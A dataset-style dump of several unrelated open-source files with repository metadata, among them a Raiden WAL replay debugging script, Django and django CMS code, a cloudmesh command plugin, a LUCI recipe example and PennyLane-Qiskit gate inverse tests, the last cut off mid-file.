def _make_regex(self) -> None:
rxp = "|".join(map(self._address_rxp, self.keys()))
self._regex = re.compile(rxp, re.IGNORECASE)
def __setitem__(self, key: str, value: Any) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __pop__(self, key: str) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __getitem__(self, key: str) -> Any:
try:
return dict.__getitem__(self, key)
except KeyError as e:
alt = self._extra_keys.get(key)
try:
return dict.__getitem__(self, alt)
except KeyError:
raise e
def __call__(self, match: re.Match) -> str:
return "[{}]".format(self[match.group(0).lower()])
def translate(self, text: str) -> str:
assert self._regex is not None, "regex not set"
return self._regex.sub(self, text)
def state_change_contains_secrethash(obj: Any, secrethash: SecretHash) -> bool:
return (hasattr(obj, "secrethash") and obj.secrethash == secrethash) or (
hasattr(obj, "transfer")
and (
(hasattr(obj.transfer, "secrethash") and obj.transfer.secrethash == secrethash)
or (hasattr(obj.transfer, "lock") and obj.transfer.lock.secrethash == secrethash)
)
)
def state_change_with_nonce(
obj: Any, nonce: Nonce, channel_identifier: ChannelID, sender: Address
) -> bool:
return (
hasattr(obj, "balance_proof")
and obj.balance_proof.nonce == nonce
and obj.balance_proof.channel_identifier == channel_identifier
and obj.balance_proof.sender == to_canonical_address(sender)
)
def print_attributes(data: Dict, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
for key, value in data.items():
if isinstance(value, bytes):
value = encode_hex(value)
click.echo("\t", nl=False)
click.echo(click.style(key, fg="blue"), nl=False)
click.echo(click.style("="), nl=False)
click.echo(click.style(trans(repr(value)), fg="yellow"))
def print_state_change(state_change: StateChange, translator: Optional[Translator] = None) -> None:
click.echo(click.style(f"> {state_change.__class__.__name__}", fg="red", bold=True))
print_attributes(state_change.__dict__, translator=translator)
def print_events(events: Iterable[Event], translator: Optional[Translator] = None) -> None:
for event in events:
click.echo(click.style(f"< {event.__class__.__name__}", fg="green", bold=True))
print_attributes(event.__dict__, translator=translator)
def print_presence_view(chain_state: Any, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
def network_state_to_color(network_state: NetworkState) -> Optional[str]:
if network_state == NetworkState.REACHABLE:
return "green"
if network_state == NetworkState.UNREACHABLE:
return "red"
if network_state == NetworkState.UNKNOWN:
return "white"
return None
click.secho("Presence:", nl=False, fg="white")
for k, v in chain_state.nodeaddresses_to_networkstates.items():
click.secho(f" {trans(pex(k))}", fg=network_state_to_color(v), nl=False)
click.echo("", nl=True)
def get_node_balances(
chain_state: Any, token_network_address: TokenNetworkAddress
) -> List[Tuple[Address, Balance, Balance]]:
channels = views.list_all_channelstate(chain_state)
channels = [
raiden_channel
for raiden_channel in channels
if raiden_channel.canonical_identifier.token_network_address
== to_canonical_address(token_network_address)
]
balances = [
(
channel_state.partner_state.address,
channel.get_balance(channel_state.our_state, channel_state.partner_state),
channel.get_balance(channel_state.partner_state, channel_state.our_state),
)
for channel_state in channels
]
return balances
def print_node_balances(
chain_state: Any,
token_network_address: TokenNetworkAddress,
translator: Optional[Translator] = None,
) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
balances = get_node_balances(chain_state, token_network_address)
for balance in balances:
click.secho(f"{trans(pex(balance[0]))} ->{balance[1]} <-{balance[2]}", fg="blue")
click.secho(f"Sum {trans(pex(chain_state.our_address))}: {sum(b[1] for b in balances)}")
def print_nl() -> None:
click.echo("-" * click.get_terminal_size()[0], nl=True)
def replay_wal(
storage: SerializedSQLiteStorage,
token_network_address: TokenNetworkAddress,
partner_address: Address,
translator: Optional[Translator] = None,
) -> None:
snapshot = storage.get_snapshot_before_state_change(
state_change_identifier=LOW_STATECHANGE_ULID
)
assert snapshot is not None, "No snapshot found"
wal = WriteAheadLog(snapshot.data, storage, node.state_transition)
state = wal.get_current_state()
all_state_changes = storage.get_statechanges_by_range(RANGE_ALL_STATE_CHANGES)
for state_change in all_state_changes:
state, events = dispatch(
state=state,
state_change=state_change,
state_transition=wal.state_transition,
)
msg = "Chain state must never be cleared up."
assert state, msg
channel_state = views.get_channelstate_by_token_network_and_partner(
state,
to_canonical_address(token_network_address),
to_canonical_address(partner_address),
)
if channel_state is None:
continue
print_state_change(state_change, translator=translator)
print_events(events, translator=translator)
print_nl()
@click.command(help=__doc__)
@click.argument("db-file", type=click.Path(exists=True))
@click.argument("token-network-address")
@click.argument("partner-address")
@click.option(
"-x",
"--names-translator",
type=click.File(),
help="A JSON file with replacement rules, e.g.: "
'\'{ "0xb4f44cd22a84DE0774B802e422D4c26A73Dd68d7": "Bob", '
'"identifier": "XXX" }\' would replace all instances of the address (pex\'ed, lowercase, '
'checksummed) with "[Bob]" and all mentions of "identifier" with "[XXX]. '
'It also allows you to use "Bob" as parameter value for "-n" and "-p" switches.',
)
def main(
db_file: str, token_network_address: str, partner_address: str, names_translator: TextIO
) -> None:
translator: Optional[Translator]
if names_translator:
translator = Translator(json.load(names_translator))
lookup = {v: k for k, v in translator.items()}
token_network_address = lookup.get(token_network_address, token_network_address)
partner_address = lookup.get(partner_address, partner_address)
else:
translator = None
assert is_address(token_network_address), "token_network_address must be provided"
assert is_address(partner_address), "partner_address must be provided"
with closing(SerializedSQLiteStorage(Path(db_file), JSONSerializer())) as storage:
replay_wal(
storage=storage,
token_network_address=TokenNetworkAddress(to_canonical_address(token_network_address)),
partner_address=to_canonical_address(partner_address),
translator=translator,
)
if __name__ == "__main__":
main() # pylint: disable=no-value-for-parameter
| true | true |
1c3c7f55377f7b300bbda40d7779e8a3d87fb58e | 199 | py | Python | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | from testing_fail import divide
import pytest
def test_divide_when_other_number_is_zero_raises_an_exception():
with pytest.raises(ZeroDivisionError, match="division by zero"):
divide(2, 0) | 33.166667 | 68 | 0.80402 | from testing_fail import divide
import pytest
def test_divide_when_other_number_is_zero_raises_an_exception():
with pytest.raises(ZeroDivisionError, match="division by zero"):
divide(2, 0) | true | true |
1c3c7fa160c023eb462f4d6b93557b293d6c71bc | 774 | py | Python | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | 3 | 2015-01-27T01:05:01.000Z | 2018-09-23T03:05:55.000Z | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | null | null | null | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from django.conf.urls import patterns, include, url
# from django.contrib import admin
# admin.autodiscover()
from PenBlog import views
urlpatterns = patterns('',
#首页
url(r'^$', views.show_homepage, {'page': 1}),
url( r'^page/(\d+?)/$', views.show_homepage),
#调试时取得静态文件
url(r'\.(css|js|png|jpg|gif|xml|swf|html)$', views.get_file),
#安装页面
url(r'^install/$', views.install),
url(r'^login/', views.login),
url(r'^logout/', views.logout),
url(r'^register/$', views.register),
url(r'^article/(\d+?)/$', views.show_article),
url(r'^category/(.+?)/$', views.show_category),
url(r'^tag/(.+?)/$', views.show_tag),
# 管理员页面
url(r'^admin/', include('PenBlog.admin.urls')),
)
| 25.8 | 65 | 0.603359 |
from django.conf.urls import patterns, include, url
from PenBlog import views
urlpatterns = patterns('',
url(r'^$', views.show_homepage, {'page': 1}),
url( r'^page/(\d+?)/$', views.show_homepage),
url(r'\.(css|js|png|jpg|gif|xml|swf|html)$', views.get_file),
url(r'^install/$', views.install),
url(r'^login/', views.login),
url(r'^logout/', views.logout),
url(r'^register/$', views.register),
url(r'^article/(\d+?)/$', views.show_article),
url(r'^category/(.+?)/$', views.show_category),
url(r'^tag/(.+?)/$', views.show_tag),
url(r'^admin/', include('PenBlog.admin.urls')),
)
| true | true |
1c3c7fba409c4819576e4f1f3a92ff3597ce9484 | 494 | py | Python | sdk/batch/azure-batch/azure/batch/_version.py | moovy2/azure-sdk-for-python | 6b0495dc9917d47a7264f26cbd3221d43461a537 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/batch/azure-batch/azure/batch/_version.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/batch/azure-batch/azure/batch/_version.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
VERSION = "11.0.1"
| 35.285714 | 76 | 0.520243 |
VERSION = "11.0.1"
| true | true |
1c3c81a1792f488fe2e3c6317ed7f0974f6c7a4b | 3,520 | py | Python | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | null | null | null | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | null | null | null | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | 1 | 2020-03-23T03:03:30.000Z | 2020-03-23T03:03:30.000Z | """
The sys command to manage the cmd5 distribution
"""
from cloudmesh.shell.command import PluginCommand
from cloudmesh.shell.command import command
from cloudmesh.sys.manage import Command, Git, Version
import shutil
import glob
from cloudmesh.common.util import path_expand
import os
class SysCommand(PluginCommand):
"""
The system command
"""
# noinspection PyUnusedLocal
@command
def do_sys(self, args, arguments):
"""
::
Usage:
sys upload
sys commit MESSAGE
sys command generate NAME [.]
sys generate command NAME [.]
sys version VERSION
This command does some useful things.
Arguments:
MESSAGE the message to commit
NAME the command to generate
VERSION the version number
Options:
-f specify the file
Description:
cms sys command generate NAME
When you execute this command it
will generate a directory tree for a command
with the name
cloudmesh-NAME
To install the command you need to
cd cloudmesh-NAME
pip install -e .
or
pip install .
cms sys generate command NAME .
cms sys command generate NAME .
the code will be installed in the current directory. This is
helpful, if you already are in a directory fof the name
cloudmesh-NAME, e.g. if you already created it in github and
like to add a command in that github directory.
The commands 'version', 'commit' and 'upload'
are only to be used by Gregor.
cms version
The version command adds a new version to the
VERSION file for cmd5, common, and sys.
This helps to keep the versions aligned across
these modules.
cms commit
The commit command adds a new version and commits
cms upload
The upload command uploads the new version to pypi
"""
print(arguments)
dot = arguments["."]
if arguments.commit:
msg = arguments.MESSAGE
Git.commit(msg)
elif arguments.upload:
Git.upload()
elif arguments.readme and arguments.generate:
name = arguments.NAME
Command.generate(name)
elif arguments.command and arguments.generate:
name = arguments.NAME
Command.generate(name)
if dot:
for file in ["LICENSE",
".bumpversion.cfg",
".gitignore",
"requirements.txt",
"Makefile"]:
try:
os.remove(file)
except:
pass
for entry in glob.glob("cloudmesh-{name}/**".format(name=name)):
shutil.move(entry, path_expand("."))
for entry in glob.glob("cloudmesh-{name}/.*".format(name=name)):
shutil.move(entry, path_expand("."))
shutil.rmtree("cloudmesh-{name}".format(name=name))
elif arguments.version:
version = arguments.VERSION
Version.set(version)
| 27.5 | 80 | 0.52642 | from cloudmesh.shell.command import PluginCommand
from cloudmesh.shell.command import command
from cloudmesh.sys.manage import Command, Git, Version
import shutil
import glob
from cloudmesh.common.util import path_expand
import os
class SysCommand(PluginCommand):
@command
def do_sys(self, args, arguments):
print(arguments)
dot = arguments["."]
if arguments.commit:
msg = arguments.MESSAGE
Git.commit(msg)
elif arguments.upload:
Git.upload()
elif arguments.readme and arguments.generate:
name = arguments.NAME
Command.generate(name)
elif arguments.command and arguments.generate:
name = arguments.NAME
Command.generate(name)
if dot:
for file in ["LICENSE",
".bumpversion.cfg",
".gitignore",
"requirements.txt",
"Makefile"]:
try:
os.remove(file)
except:
pass
for entry in glob.glob("cloudmesh-{name}/**".format(name=name)):
shutil.move(entry, path_expand("."))
for entry in glob.glob("cloudmesh-{name}/.*".format(name=name)):
shutil.move(entry, path_expand("."))
shutil.rmtree("cloudmesh-{name}".format(name=name))
elif arguments.version:
version = arguments.VERSION
Version.set(version)
| true | true |
1c3c823675ef391f2f5882e9796ce320b343f4c1 | 1,523 | py | Python | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | 1 | 2021-04-24T04:03:01.000Z | 2021-04-24T04:03:01.000Z | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | null | null | null | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from recipe_engine.post_process import (DropExpectation, StepSuccess,
DoesNotRunRE)
from PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2
from PB.go.chromium.org.luci.resultdb.proto.v1 import invocation as invocation_pb2
DEPS = [
'buildbucket',
'resultdb',
]
def RunSteps(api):
inv_bundle = api.resultdb.query(
['deadbeef'],
step_name='rdb query',
variants_with_unexpected_results=True,
)
invocation_ids = inv_bundle.keys()
api.resultdb.include_invocations(invocation_ids, step_name='rdb include')
api.resultdb.exclude_invocations(invocation_ids, step_name='rdb exclude')
def GenTests(api):
yield (
api.test('noop') +
api.buildbucket.ci_build() +
api.resultdb.query({}, step_name='rdb query') +
api.post_process(
DoesNotRunRE, 'rdb include', 'rdb exclude') +
api.post_process(DropExpectation)
)
inv_bundle = {
'invid': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
'invid2': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
}
yield (
api.test('basic') +
api.buildbucket.ci_build() +
api.resultdb.query(
inv_bundle,
step_name='rdb query')
)
| 27.690909 | 82 | 0.693368 |
from recipe_engine.post_process import (DropExpectation, StepSuccess,
DoesNotRunRE)
from PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2
from PB.go.chromium.org.luci.resultdb.proto.v1 import invocation as invocation_pb2
DEPS = [
'buildbucket',
'resultdb',
]
def RunSteps(api):
inv_bundle = api.resultdb.query(
['deadbeef'],
step_name='rdb query',
variants_with_unexpected_results=True,
)
invocation_ids = inv_bundle.keys()
api.resultdb.include_invocations(invocation_ids, step_name='rdb include')
api.resultdb.exclude_invocations(invocation_ids, step_name='rdb exclude')
def GenTests(api):
yield (
api.test('noop') +
api.buildbucket.ci_build() +
api.resultdb.query({}, step_name='rdb query') +
api.post_process(
DoesNotRunRE, 'rdb include', 'rdb exclude') +
api.post_process(DropExpectation)
)
inv_bundle = {
'invid': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
'invid2': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
}
yield (
api.test('basic') +
api.buildbucket.ci_build() +
api.resultdb.query(
inv_bundle,
step_name='rdb query')
)
| true | true |
1c3c828fa327c8f7bb69e82337a322cd7761fe1b | 2,862 | py | Python | djangocms_baseplugins/cms_form_designer/cms_plugins.py | benzkji/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | 2 | 2019-04-14T01:31:22.000Z | 2020-03-05T13:06:57.000Z | djangocms_baseplugins/cms_form_designer/cms_plugins.py | benzkji/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | 32 | 2017-04-04T09:28:06.000Z | 2021-08-18T16:23:02.000Z | djangocms_baseplugins/cms_form_designer/cms_plugins.py | bnzk/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | null | null | null | # coding: utf-8
import uuid
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django import forms
from django.contrib import admin
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from djangocms_baseplugins.baseplugin.cms_plugins import BasePluginMixin
from djangocms_baseplugins.baseplugin.utils import build_baseplugin_fieldset, \
get_fields_from_fieldsets, build_baseplugin_widgets, get_baseplugin_widgets
from djangocms_baseplugins.baseplugin import defaults
# from django.core.mail import send_mail
# from django.shortcuts import render
from .utils import check_form_send
from .models import FormDesigner, FormDefaultValue
from . import conf
# from django.conf import settings
class FormDefaultValueInline(admin.TabularInline):
model = FormDefaultValue
extra = 1
class FormDesignerPluginForm(forms.ModelForm):
class Meta:
model = FormDesigner
fields = get_fields_from_fieldsets(conf.FIELDSETS)
# exclude = []
widgets = get_baseplugin_widgets(conf)
@plugin_pool.register_plugin
class FormDesignerPlugin(BasePluginMixin, CMSPluginBase):
model = FormDesigner
module = conf.MODULE
name = conf.NAME
cache = False
form = FormDesignerPluginForm
inlines = (FormDefaultValueInline, )
render_template = "djangocms_baseplugins/form_designer.html"
allow_children = conf.ALLOW_CHILDREN
child_classes = conf.CHILD_CLASSES
require_parent = conf.REQUIRE_PARENT
fieldsets = conf.FIELDSETS
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
request = context.get('request', None)
# defaults
initial = {}
for default in instance.default_values.all():
initial[slugify(default.field_name)] = slugify(default.default)
# build form
form_class = instance.form.form()
form = None
if request and request.method.lower() == 'post':
if request.POST.get('form_content_id', None) == str(instance.id):
form = form_class(request.POST, initial=initial)
if not form:
form = form_class(initial=initial)
sent = check_form_send(instance, request)
if sent:
# sent directly
context["sent"] = True
# if middleware is enabled, this causes the reidrect!
request.form_designer_sent = instance.pk
# if not, we dont get a redirect, and can submit the form again, with F5!
elif request and request.GET.get('sent', None) and request.GET.get('id', None) == str(instance.pk):
# sent via app hook
context["sent"] = True
context['form'] = form
context['submit_uuid'] = str(uuid.uuid1())
return context
| 36.692308 | 107 | 0.701607 |
import uuid
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django import forms
from django.contrib import admin
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from djangocms_baseplugins.baseplugin.cms_plugins import BasePluginMixin
from djangocms_baseplugins.baseplugin.utils import build_baseplugin_fieldset, \
get_fields_from_fieldsets, build_baseplugin_widgets, get_baseplugin_widgets
from djangocms_baseplugins.baseplugin import defaults
from .utils import check_form_send
from .models import FormDesigner, FormDefaultValue
from . import conf
class FormDefaultValueInline(admin.TabularInline):
model = FormDefaultValue
extra = 1
class FormDesignerPluginForm(forms.ModelForm):
class Meta:
model = FormDesigner
fields = get_fields_from_fieldsets(conf.FIELDSETS)
widgets = get_baseplugin_widgets(conf)
@plugin_pool.register_plugin
class FormDesignerPlugin(BasePluginMixin, CMSPluginBase):
model = FormDesigner
module = conf.MODULE
name = conf.NAME
cache = False
form = FormDesignerPluginForm
inlines = (FormDefaultValueInline, )
render_template = "djangocms_baseplugins/form_designer.html"
allow_children = conf.ALLOW_CHILDREN
child_classes = conf.CHILD_CLASSES
require_parent = conf.REQUIRE_PARENT
fieldsets = conf.FIELDSETS
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
request = context.get('request', None)
initial = {}
for default in instance.default_values.all():
initial[slugify(default.field_name)] = slugify(default.default)
form_class = instance.form.form()
form = None
if request and request.method.lower() == 'post':
if request.POST.get('form_content_id', None) == str(instance.id):
form = form_class(request.POST, initial=initial)
if not form:
form = form_class(initial=initial)
sent = check_form_send(instance, request)
if sent:
context["sent"] = True
request.form_designer_sent = instance.pk
elif request and request.GET.get('sent', None) and request.GET.get('id', None) == str(instance.pk):
context["sent"] = True
context['form'] = form
context['submit_uuid'] = str(uuid.uuid1())
return context
| true | true |
1c3c83626908ec5b7a167858c74ebdcf9cf8167b | 522 | py | Python | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
from RecoBTag.Skimming.btagMC_QCD_380_470_EventContent_cff import *
btagMC_QCD_380_470OutputModule = cms.OutputModule("PoolOutputModule",
btagMC_QCD_380_470EventSelection,
FEVTSIMEventContent,
dataset = cms.untracked.PSet(
filterName = cms.untracked.string('btagMC_QCD_380_470'),
dataTier = cms.untracked.string('USER')
),
fileName = cms.untracked.string('btagMC_QCD_380_470.root')
)
| 32.625 | 69 | 0.777778 | import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
from RecoBTag.Skimming.btagMC_QCD_380_470_EventContent_cff import *
btagMC_QCD_380_470OutputModule = cms.OutputModule("PoolOutputModule",
btagMC_QCD_380_470EventSelection,
FEVTSIMEventContent,
dataset = cms.untracked.PSet(
filterName = cms.untracked.string('btagMC_QCD_380_470'),
dataTier = cms.untracked.string('USER')
),
fileName = cms.untracked.string('btagMC_QCD_380_470.root')
)
| true | true |
1c3c83caf0e0f96a864074a2ce45955ef49e3112 | 267 | py | Python | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | magusikrak/NAMI-TERM-I-GroupWork | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | null | null | null | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | magusikrak/NAMI-TERM-I-GroupWork | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | 1 | 2021-07-24T03:18:30.000Z | 2021-07-24T12:45:07.000Z | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | sugamkarki/NAMI-Year-II-TERM-I-Group_Project | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | null | null | null | # str="hi i m adon"
#
myFile=open("c.txt","r")
countriesRaw=myFile.read()
countriesNeat=''
countriesRaw= countriesRaw.split(" ")
for country in countriesRaw:
# print(country)
if(len(country)>1):
countriesNeat =countriesNeat+'\n'+country
print | 24.272727 | 49 | 0.666667 |
myFile=open("c.txt","r")
countriesRaw=myFile.read()
countriesNeat=''
countriesRaw= countriesRaw.split(" ")
for country in countriesRaw:
if(len(country)>1):
countriesNeat =countriesNeat+'\n'+country
print | true | true |
1c3c83dfa812ecc2f3f7ce8b8c18dca085ae6f24 | 9,126 | py | Python | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 75 | 2020-08-07T14:21:15.000Z | 2022-03-23T15:19:28.000Z | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 110 | 2020-07-28T07:02:17.000Z | 2022-03-28T20:47:27.000Z | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 23 | 2020-08-06T08:07:18.000Z | 2022-03-03T01:28:26.000Z | import pytest
import pennylane as qml
import math
import cmath
import numpy as np
# defaults
tol = 1e-5
class TestInverses:
"""Tests that the inverse of the operations are applied."""
# This test is ran against the state |0> with one Z expval
@pytest.mark.parametrize(
"name,expected_output",
[
("Identity", 1),
("PauliX", -1),
("PauliY", -1),
("PauliZ", 1),
("Hadamard", 0),
("S", 1),
("T", 1),
("SX", 0),
],
)
def test_supported_gate_inverse_single_wire_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on a single wire that are not
parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
@qml.qnode(dev)
def circuit():
op(wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran against the state |Phi+> with two Z expvals
@pytest.mark.parametrize(
"name,expected_output",
[
("CNOT", [-1 / 2, 1]),
("SWAP", [-1 / 2, -1 / 2]),
("CZ", [-1 / 2, -1 / 2]),
],
)
def test_supported_gate_inverse_two_wires_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on two wires that are not parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CSWAP", [-1, -1, 1]),
],
)
def test_supported_gate_inverse_three_wires_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on three wires that are not parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=3, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.BasisState(np.array([1, 0, 1]), wires=[0, 1, 2])
op(wires=[0, 1, 2]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliZ(2))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran on the state |0> with one Z expvals
@pytest.mark.parametrize(
"name,par,expected_output",
[
("PhaseShift", [math.pi / 2], 1),
("PhaseShift", [-math.pi / 4], 1),
("RX", [math.pi / 2], 0),
("RX", [-math.pi / 4], 1 / math.sqrt(2)),
("RY", [math.pi / 2], 0),
("RY", [-math.pi / 4], 1 / math.sqrt(2)),
("RZ", [math.pi / 2], 1),
("RZ", [-math.pi / 4], 1),
(
"QubitUnitary",
[
np.array(
[
[1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), -1j / math.sqrt(2)],
]
)
],
0,
),
(
"QubitUnitary",
[
np.array(
[
[-1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), 1j / math.sqrt(2)],
]
)
],
0,
),
],
)
def test_supported_gate_inverse_single_wire_with_parameters(self, name, par, expected_output):
"""Test the inverse of single gates with parameters"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran against the state 1/2|00>+sqrt(3)/2|11> with two Z expvals
@pytest.mark.parametrize(
"name,par,expected_output",
[
("CRZ", [0], [-1 / 2, -1 / 2]),
("CRZ", [-math.pi], [-1 / 2, -1 / 2]),
("CRZ", [math.pi / 2], [-1 / 2, -1 / 2]),
(
"QubitUnitary",
[
np.array(
[
[1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, 1],
]
)
],
[-1 / 2, -1 / 2],
),
(
"QubitUnitary",
[
np.array(
[
[-1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, -1],
]
)
],
[-1 / 2, -1 / 2],
),
],
)
def test_supported_gate_inverse_two_wires_with_parameters(self, name, par, expected_output):
"""Tests the inverse of supported gates that act on two wires that are parameterized"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(*np.negative(par), wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("Rot", [math.pi / 2, 0, 0], 1),
("Rot", [0, math.pi / 2, 0], 0),
("Rot", [0, 0, math.pi / 2], 1),
("Rot", [math.pi / 2, -math.pi / 4, -math.pi / 4], 1 / math.sqrt(2)),
("Rot", [-math.pi / 4, math.pi / 2, math.pi / 4], 0),
